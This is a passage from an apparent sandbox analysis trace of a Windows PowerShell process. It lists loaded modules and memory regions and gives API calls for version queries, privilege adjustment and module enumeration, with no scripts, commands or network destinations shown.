"c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.data\\accc3a5269658c8c47fe3e402ac4ac1c\\system.data.ni.dll") Region: id = 1017 start_va = 0x7fefdc30000 end_va = 0x7fefdc3efff entry_point = 0x7fefdc30000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1018 start_va = 0x7fefddf0000 end_va = 0x7fefdf56fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1019 start_va = 0x7fefee30000 end_va = 0x7fefee7cfff entry_point = 0x7fefee30000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1020 start_va = 0x7feffec0000 end_va = 0x7feffec7fff entry_point = 0x7feffec0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1021 start_va = 0x7ff00210000 end_va = 0x7ff0021ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00210000" filename = "" Region: id = 1022 start_va = 0x7ff00220000 end_va = 0x7ff0022ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00220000" filename = "" Region: id = 1023 start_va = 0x2aa0000 end_va = 0x2aaffff entry_point = 0x0 region_type = private name = "private_0x0000000002aa0000" filename = "" Region: id = 1024 start_va = 0x2b30000 end_va = 0x2b3ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b30000" filename = "" Region: id = 1025 start_va = 0x2b40000 end_va = 0x2b4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b40000" filename = "" Region: id = 1026 start_va = 0x2b50000 end_va = 0x2b5ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b50000" filename = "" Region: id = 1027 start_va = 0x7ff00230000 end_va = 0x7ff0023ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00230000" filename = "" Region: id = 1028 start_va = 0x7ff00240000 end_va = 0x7ff0024ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00240000" filename = "" Region: id = 1029 start_va = 0x7ff00250000 end_va = 0x7ff0025ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00250000" filename = "" Region: id = 1030 start_va = 0x7fef90f0000 end_va = 0x7fef90f6fff entry_point = 0x7fef90f0000 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\System32\\shfolder.dll" (normalized: "c:\\windows\\system32\\shfolder.dll") Region: id = 1031 start_va = 0x7ff00260000 end_va = 0x7ff0026ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00260000" filename = "" Region: id = 1032 start_va = 0x2b60000 end_va = 0x2b6ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b60000" filename = "" Region: id = 1033 start_va = 0x1bd00000 end_va = 0x1c68ffff entry_point = 0x0 region_type = private name = "private_0x000000001bd00000" filename = "" Region: id = 1034 start_va = 0x7fede260000 end_va = 0x7fede3a2fff entry_point = 0x7fede260000 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Configuration\\091b931d0f6408001747dbbbb05dbe66\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.configuration\\091b931d0f6408001747dbbbb05dbe66\\system.configuration.ni.dll") Region: id = 1035 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 1036 start_va = 0x7fef4d40000 end_va = 0x7fef4d5bfff entry_point = 0x7fef4d40000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 1037 start_va = 0x7fef4d60000 end_va = 0x7fef4dc1fff entry_point = 0x7fef4d60000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 1038 start_va = 0x7fef6570000 end_va = 0x7fef6580fff entry_point = 0x7fef6570000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 1039 start_va = 0x7fefd420000 end_va = 0x7fefd474fff entry_point = 0x7fefd420000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1040 start_va = 0x1c690000 end_va = 0x1c89ffff entry_point = 0x0 region_type = private name = "private_0x000000001c690000" filename = "" Region: id = 1041 start_va = 0x7fefce20000 end_va = 0x7fefce26fff entry_point = 0x7fefce20000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1042 start_va = 0x7fefd410000 end_va = 0x7fefd416fff entry_point = 0x7fefd410000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1043 start_va = 0x1b3f0000 end_va = 0x1b40ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001b3f0000" filename = "" Region: id = 1044 start_va = 0x1c760000 end_va = 0x1c7dffff entry_point = 0x0 region_type = private name = "private_0x000000001c760000" filename = "" Region: id = 1045 start_va = 0x1c820000 end_va = 0x1c89ffff entry_point = 0x0 region_type = private name = "private_0x000000001c820000" filename = "" Region: id = 1046 start_va = 0x1c910000 end_va = 0x1c98ffff entry_point = 0x0 region_type = private name = "private_0x000000001c910000" filename = "" Region: id = 1047 start_va = 0x7fef7190000 end_va = 0x7fef71f3fff entry_point = 0x7fef7190000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 1048 start_va = 0x7fef7200000 end_va = 0x7fef7270fff entry_point = 0x7fef7200000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1049 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 1050 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 1051 start_va = 0x7fefb680000 end_va = 0x7fefb6a6fff entry_point = 0x7fefb680000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1052 start_va = 0x7fefb670000 end_va = 0x7fefb67afff entry_point = 0x7fefb670000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1053 start_va = 0x7fef9680000 end_va = 0x7fef9690fff entry_point = 0x7fef9680000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1054 start_va = 0x7fef9660000 end_va = 0x7fef9677fff entry_point = 0x7fef9660000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1055 start_va = 0x7fefd080000 end_va = 0x7fefd089fff entry_point = 0x7fefd080000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 1056 start_va = 0x1c9e0000 end_va = 0x1ca5ffff entry_point = 0x0 region_type = private name = "private_0x000000001c9e0000" filename = "" Region: id = 1057 start_va = 0x7fefd2a0000 end_va = 0x7fefd2fafff entry_point = 0x7fefd2a0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1058 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 1059 start_va = 0x1ca60000 end_va = 0x1cc2ffff entry_point = 0x0 region_type = private name = "private_0x000000001ca60000" filename = "" Region: id = 1060 start_va = 0x7fefbc10000 end_va = 0x7fefbc17fff entry_point = 0x7fefbc10000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1393 start_va = 0x2b70000 end_va = 0x2b70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b70000" filename = "" Region: id = 1394 start_va = 0x516f00000 end_va = 0x516fc5fff entry_point = 0x516f00000 region_type = mapped_file name = "diasymreader.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\diasymreader.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\diasymreader.dll") Region: id = 1395 start_va = 0x7ff00270000 end_va = 0x7ff0027ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00270000" filename = "" Region: id = 1396 start_va = 0x1cab0000 end_va = 0x1cb2ffff entry_point = 0x0 region_type = private name = "private_0x000000001cab0000" filename = "" Region: id = 1397 start_va = 0x1cbb0000 end_va = 0x1cc2ffff entry_point = 0x0 region_type = private name = "private_0x000000001cbb0000" filename = "" Region: id = 1398 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 1399 start_va = 0x1bc80000 end_va = 0x1bc83fff entry_point = 0x1bc80000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1400 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1401 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1402 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1403 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1404 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1405 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1406 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1407 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1408 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1409 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1410 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1411 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1412 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1413 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1414 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1415 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1416 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1417 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1418 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1419 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1420 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1421 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1422 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1423 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1424 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1425 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1426 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1427 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1428 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1429 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1430 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1431 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1432 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1433 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1434 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1435 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1436 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1437 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1438 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1439 start_va = 0x1cc30000 end_va = 0x1cd30fff entry_point = 0x0 region_type = private name = "private_0x000000001cc30000" filename = "" Region: id = 1440 start_va = 0x7fef8e50000 end_va = 0x7fef8e83fff entry_point = 0x7fef8e50000 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 1441 start_va = 0x7feff6e0000 end_va = 0x7feff857fff entry_point = 0x7feff6e0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 1442 start_va = 0x7feff870000 end_va = 0x7feff999fff entry_point = 0x7feff870000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 1443 start_va = 0x7fefee80000 end_va = 0x7feff0d8fff entry_point = 0x7fefee80000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1444 start_va = 0x1bc90000 end_va = 0x1bc90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001bc90000" filename = "" Thread: id = 36 os_tid = 0xa84 [0053.974] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0054.306] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0054.306] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0054.306] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0054.306] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0054.700] GetVersionExW (in: lpVersionInformation=0xcdf40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcdf40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0054.701] GetVersionExW (in: lpVersionInformation=0xcdf40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcdf40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0054.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.711] GetVersionExW (in: lpVersionInformation=0xcdcb0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcdcb0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0054.712] SetErrorMode (uMode=0x1) returned 0x1 [0054.712] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xcde10 | out: lpFileInformation=0xcde10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0054.713] SetErrorMode (uMode=0x1) returned 0x1 [0054.716] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xce080 | out: lpdwHandle=0xce080) returned 0x94c [0054.717] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c07290 | out: lpData=0x2c07290) returned 1 [0054.719] VerQueryValueW (in: pBlock=0x2c07290, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdff8, puLen=0xcdff0 | out: lplpBuffer=0xcdff8*=0x2c0732c, puLen=0xcdff0) returned 1 [0054.722] lstrlenW (lpString="䅁") returned 1 [0054.728] VerQueryValueW (in: pBlock=0x2c07290, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xcdf68, puLen=0xcdf60 | out: lplpBuffer=0xcdf68*=0x2c07408, puLen=0xcdf60) returned 1 [0054.729] lstrlenW (lpString="Microsoft Corporation") returned 21 [0054.731] CoTaskMemAlloc (cb=0x2e) returned 0x2747c0 [0054.731] lstrcpyW (in: lpString1=0x2747c0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0054.731] CoTaskMemFree (pv=0x2747c0) [0054.732] VerQueryValueW (in: pBlock=0x2c07290, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xcdf68, puLen=0xcdf60 | out: lplpBuffer=0xcdf68*=0x2c0745c, puLen=0xcdf60) returned 1 [0054.732] lstrlenW (lpString="System.Management.Automation") returned 28 [0054.732] CoTaskMemAlloc (cb=0x3c) returned 0x259b50 [0054.732] lstrcpyW (in: lpString1=0x259b50, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0054.732] CoTaskMemFree (pv=0x259b50) [0054.732] VerQueryValueW (in: pBlock=0x2c07290, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xcdf68, puLen=0xcdf60 | out: lplpBuffer=0xcdf68*=0x2c074b8, puLen=0xcdf60) returned 1 [0054.732] lstrlenW (lpString="6.1.7601.17514") returned 14 [0054.732] CoTaskMemAlloc (cb=0x20) returned 0x318760 [0054.732] lstrcpyW (in: lpString1=0x318760, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0054.732] CoTaskMemFree (pv=0x318760) [0054.732] VerQueryValueW (in: pBlock=0x2c07290, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xcdf68, puLen=0xcdf60 | out: lplpBuffer=0xcdf68*=0x2c074f8, puLen=0xcdf60) returned 1 [0054.732] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0054.732] CoTaskMemAlloc (cb=0x44) returned 0x259b50 [0054.732] lstrcpyW (in: lpString1=0x259b50, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0054.732] CoTaskMemFree (pv=0x259b50) [0054.732] VerQueryValueW (in: pBlock=0x2c07290, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xcdf68, puLen=0xcdf60 | out: lplpBuffer=0xcdf68*=0x2c07560, puLen=0xcdf60) returned 1 [0054.732] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0054.732] CoTaskMemAlloc (cb=0x76) returned 0x2caec0 [0054.732] lstrcpyW (in: lpString1=0x2caec0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0054.732] CoTaskMemFree (pv=0x2caec0) [0054.732] VerQueryValueW (in: pBlock=0x2c07290, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xcdf68, puLen=0xcdf60 | out: lplpBuffer=0xcdf68*=0x2c075fc, puLen=0xcdf60) returned 1 [0054.732] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0054.732] CoTaskMemAlloc (cb=0x44) returned 0x259b50 [0054.732] lstrcpyW (in: lpString1=0x259b50, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0054.732] CoTaskMemFree (pv=0x259b50) [0054.732] VerQueryValueW (in: pBlock=0x2c07290, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xcdf68, puLen=0xcdf60 | out: lplpBuffer=0xcdf68*=0x2c07660, puLen=0xcdf60) returned 1 [0054.732] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0054.732] CoTaskMemAlloc (cb=0x58) returned 0x27db70 [0054.732] lstrcpyW (in: lpString1=0x27db70, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0054.732] CoTaskMemFree (pv=0x27db70) [0054.732] VerQueryValueW (in: pBlock=0x2c07290, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xcdf68, puLen=0xcdf60 | out: lplpBuffer=0xcdf68*=0x2c076dc, puLen=0xcdf60) returned 1 [0054.732] lstrlenW (lpString="6.1.7601.17514") returned 14 [0054.732] CoTaskMemAlloc (cb=0x20) returned 0x318760 [0054.732] lstrcpyW (in: lpString1=0x318760, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0054.732] CoTaskMemFree (pv=0x318760) [0054.733] VerQueryValueW (in: pBlock=0x2c07290, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xcdf68, puLen=0xcdf60 | out: lplpBuffer=0xcdf68*=0x2c07384, puLen=0xcdf60) returned 1 [0054.733] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0054.733] CoTaskMemAlloc (cb=0x66) returned 0x316d60 [0054.733] lstrcpyW (in: lpString1=0x316d60, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0054.733] CoTaskMemFree (pv=0x316d60) [0054.733] VerQueryValueW (in: pBlock=0x2c07290, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xcdf68, puLen=0xcdf60 | out: lplpBuffer=0xcdf68*=0x0, puLen=0xcdf60) returned 0 [0054.733] VerQueryValueW (in: pBlock=0x2c07290, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xcdf68, puLen=0xcdf60 | out: lplpBuffer=0xcdf68*=0x0, puLen=0xcdf60) returned 0 [0054.733] VerQueryValueW (in: pBlock=0x2c07290, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xcdf68, puLen=0xcdf60 | out: lplpBuffer=0xcdf68*=0x0, puLen=0xcdf60) returned 0 [0054.733] VerQueryValueW (in: pBlock=0x2c07290, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdf38, puLen=0xcdf30 | out: lplpBuffer=0xcdf38*=0x2c0732c, puLen=0xcdf30) returned 1 [0054.734] CoTaskMemAlloc (cb=0x204) returned 0x2dc590 [0054.734] VerLanguageNameW (in: wLang=0x0, szLang=0x2dc590, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0054.736] CoTaskMemFree (pv=0x2dc590) [0054.736] VerQueryValueW (in: pBlock=0x2c07290, lpSubBlock="\\", lplpBuffer=0xcdf88, puLen=0xcdf80 | out: lplpBuffer=0xcdf88*=0x2c072b8, puLen=0xcdf80) returned 1 [0054.740] GetCurrentProcessId () returned 0xa80 [0054.752] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xcceb0 | out: lpLuid=0xcceb0*(LowPart=0x14, HighPart=0)) returned 1 [0054.754] GetCurrentProcess () returned 0xffffffffffffffff [0054.755] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0xcced0 | out: TokenHandle=0xcced0*=0x2f0) returned 1 [0054.756] AdjustTokenPrivileges (in: TokenHandle=0x2f0, DisableAllPrivileges=0, NewState=0x2c0ab08*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0054.757] CloseHandle (hObject=0x2f0) returned 1 [0054.760] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa80) returned 0x2f0 [0054.768] EnumProcessModules (in: hProcess=0x2f0, lphModule=0x2c0ab70, cb=0x200, 